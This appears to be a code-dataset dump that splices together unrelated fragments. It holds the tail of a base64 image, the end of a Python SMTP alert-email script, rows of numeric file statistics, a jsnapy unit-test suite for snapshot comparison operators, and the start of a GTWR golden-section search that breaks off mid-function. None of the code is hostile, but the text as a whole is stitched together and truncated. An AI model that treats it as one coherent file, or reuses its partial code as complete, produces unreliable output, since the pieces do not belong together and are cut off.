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" alt="Alert Platform" style="width:72px;height:72px;display:block;margin:auto"></a><br>'
default_body_foot = '<br><hr><div style="text-align:center"><p><strong>这是一封自动产生的邮件,<span style="color:#FF0000;">请勿回复</span>。</strong></p><p><strong>THIS IS AN AUTOMATED MESSAGE, PLEASE <span style="color:#FF0000;">DO NOT REPLY</span> TO THIS EMAIL.</strong></p><p style="font-size: 14px;"><strong>免责声明 | CONFIDENTIALITY NOTICE</strong></p></div><p>该电子邮件中的信息是保密的,除收件人外任何人无权访问此电子邮件。如果您不是收件人,请立即删除本邮件及附件;任何公开、复制、分发或基于此封邮件的行动,都是禁止的,并可能是违法的。</p><p>The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.</p></div></div>'
msg.attach(MIMEText(default_body_head + base64_decode(body) + default_body_foot, 'html'))
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
# server = smtplib.SMTP_SSL(smtp_server + ":" + str(smtp_port)) # In case you need SSL/TLS auth.
server.login(user, email_password)
try:
msg['To'] = base64_decode(to)
text = msg.as_string()
server.sendmail(user, base64_decode(to), text, mail_options=['SMTPUTF8'])
except smtplib.SMTPNotSupportedError:
del msg['To']  # remove the UTF-8 'To' header set above before retrying with Punycode
msg['To'] = punycode_converter(base64_decode(to))
text = msg.as_string()
server.sendmail(user, punycode_converter(base64_decode(to)), text)
server.quit()
if __name__ == "__main__":
send_email(sys.argv[1], sys.argv[2], sys.argv[3])
print("Success!", end="")
| 353.175439
| 17,402
| 0.923302
| 1,091
| 20,131
| 17.006416
| 0.726856
| 0.00097
| 0.003018
| 0.003881
| 0.015091
| 0.015091
| 0.012288
| 0.008947
| 0.008947
| 0.008947
| 0
| 0.138669
| 0.022403
| 20,131
| 56
| 17,403
| 359.482143
| 0.804116
| 0.015548
| 0
| 0.051282
| 0
| 0.051282
| 0.932112
| 0.880476
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.051282
| 0.179487
| 0
| 0.307692
| 0.025641
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
91e3efc012845ce83f11a4f6277528af2f7b6c43
| 26,435
|
py
|
Python
|
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/unit/test_comparison_op.py
|
ntwrkguru/jsnapy
|
43a7b15743cc04135ab176179493248077ed98d3
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
import unittest
import yaml
from jnpr.jsnapy.check import Comparator
from mock import patch
from nose.plugins.attrib import attr
import os
@attr('unit')
class TestComparisonOperator(unittest.TestCase):
def setUp(self):
self.diff = False
self.hostname = "1.1.1.1"
self.db = dict()
self.db['store_in_sqlite'] = False
self.db['check_from_sqlite'] = False
self.db['db_name'] = "jbb.db"
self.db['first_snap_id'] = None
self.db['second_snap_id'] = None
self.snap_del = False
self.action = None
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 2)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)  # null case will pass
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)  # even if no node is found, the comparison between null and null passes
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_true_1(self, mock_path):
# Test that if an XML element is not present in the first snapshot and the
# ignore-null flag is set, the test is skipped and execution moves ahead.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_pre",
self.action,
"snap_exists_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_true_2(self, mock_path):
# Test that if an XML element is present in the first snapshot but missing from
# the second snapshot and the ignore-null flag is set, the test reports a failure.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_post",
self.action,
"snap_exists_pre")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_less_pass(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-less.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_pass(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 2)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)  # the test name is somewhat misleading, but it follows the naming convention used here
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip(self, mock_path):
# Test that if an XML element is not present in the second snapshot and the
# ignore-null flag is set, the test is skipped and execution moves ahead.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip_2(self, mock_path):
# Test that if an XML element is present in the first snapshot but missing from
# the second snapshot and the ignore-null flag is set, the test reports a failure.
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip_2.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_exists_pre",
self.action,
"snap_exists_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_list_not_more_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_list-not-more_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 1)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_fail.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_fail_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_fail_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_skip_1(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_skip_1.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_pre",
self.action,
"snap_delta_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_delta_fail(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_delta.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_delta_fail_pre",
self.action,
"snap_delta_fail_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 1)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 2)
self.assertEqual(oper.no_failed, 4)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff_2(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_dot-dot.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 6)
@patch('jnpr.jsnapy.check.get_path')
@patch('jnpr.jsnapy.sqlite_get.get_path')
def test_no_diff_2_pass(self, mock_sqlite_path, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_dot-dot.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
mock_sqlite_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_3")
self.assertEqual(oper.no_passed, 6)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
@patch('jnpr.jsnapy.sqlite_get.get_path')
def test_no_diff_pass(self, sqlite_mock_path, mock_path):
self.hostname = '10.216.193.114'
self.chk = True
self.db['check_from_sqlite'] = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff_sql.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
sqlite_mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post1")
self.assertEqual(oper.no_passed, 6)
self.assertEqual(oper.no_failed, 0)
@patch('jnpr.jsnapy.check.get_path')
def test_no_diff_ignore_null_id_skip(self, mock_path):
self.chk = True
comp = Comparator()
conf_file = os.path.join(os.path.dirname(__file__),
'configs', 'main_no-diff_ignore-null_id_skip.yml')
mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
config_file = open(conf_file, 'r')
main_file = yaml.load(config_file, Loader=yaml.FullLoader)
oper = comp.generate_test_files(
main_file,
self.hostname,
self.chk,
self.diff,
self.db,
self.snap_del,
"snap_no-diff_pre",
self.action,
"snap_no-diff_post")
self.assertEqual(oper.no_passed, 0)
self.assertEqual(oper.no_failed, 0)
with patch('logging.Logger') as mock_logger:
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(
TestComparisonOperator)
unittest.TextTestRunner(verbosity=2).run(suite)
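Every test above repeats the same load-and-compare boilerplate; a hypothetical helper like the following (not part of the file) captures the shared pattern in one place.
# --- Hypothetical refactoring sketch of the repeated pattern ---
def run_check(self, mock_path, config_name, pre, post):
    comp = Comparator()
    conf_file = os.path.join(os.path.dirname(__file__), 'configs', config_name)
    mock_path.return_value = os.path.join(os.path.dirname(__file__), 'configs')
    with open(conf_file, 'r') as config_file:
        main_file = yaml.load(config_file, Loader=yaml.FullLoader)
    return comp.generate_test_files(main_file, self.hostname, True,  # chk
                                    self.diff, self.db, self.snap_del,
                                    pre, self.action, post)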
| 38.817915
| 120
| 0.581199
| 3,302
| 26,435
| 4.335554
| 0.039976
| 0.050293
| 0.041911
| 0.050293
| 0.947332
| 0.941883
| 0.941883
| 0.93853
| 0.93853
| 0.93853
| 0
| 0.00564
| 0.309173
| 26,435
| 680
| 121
| 38.875
| 0.778283
| 0.027539
| 0
| 0.873239
| 0
| 0
| 0.122782
| 0.063395
| 0
| 0
| 0
| 0
| 0.090767
| 1
| 0.046948
| false
| 0.051643
| 0.00939
| 0
| 0.057903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
91eee022be27deb4cceec57063bd54294c818894
| 6,344
|
py
|
Python
|
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | null | null | null |
python GTWR/gtwr-1.0.1/gtwr/search.py
|
RobinYaoWenbin/python-
|
9607219b8d057ab896ecae5326daadd7dcfb6112
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
import numpy as np
def golden_section(a, c, delta, decimal, function, tol, max_iter, verbose=False):
b = a + delta * np.abs(c - a)
d = c - delta * np.abs(c - a)
diff = 1.0e9
iters = 0
cache = {}  # memoization table (renamed from dict to avoid shadowing the builtin)
while np.abs(diff) > tol and iters < max_iter:
iters += 1
b = np.round(b, decimal)
d = np.round(d, decimal)
if b in cache:
score_b = cache[b]
else:
score_b = function(b)
cache[b] = score_b
if d in cache:
score_d = cache[d]
else:
score_d = function(d)
cache[d] = score_d
if score_b <= score_d:
opt_val = b
opt_score = score_b
c = d
d = b
b = a + delta * np.abs(c - a)
else:
opt_val = d
opt_score = score_d
a = b
b = d
d = c - delta * np.abs(c - a)
opt_val = np.round(opt_val, decimal)
diff = score_b - score_d
if verbose:
print('bw:', opt_val, ', score:', np.round(opt_score,2))
return opt_val
def onestep_golden_section(A, C, x, delta, taudecimal, function, tol, mpi=False):
iters = 0
cache = {}
diff = 1e9
opt_score = None
opt_tau = None
B = A + delta * np.abs(C - A)
D = C - delta * np.abs(C - A)
while np.abs(diff) > tol and iters < 200:
iters += 1
B = np.round(B, taudecimal)
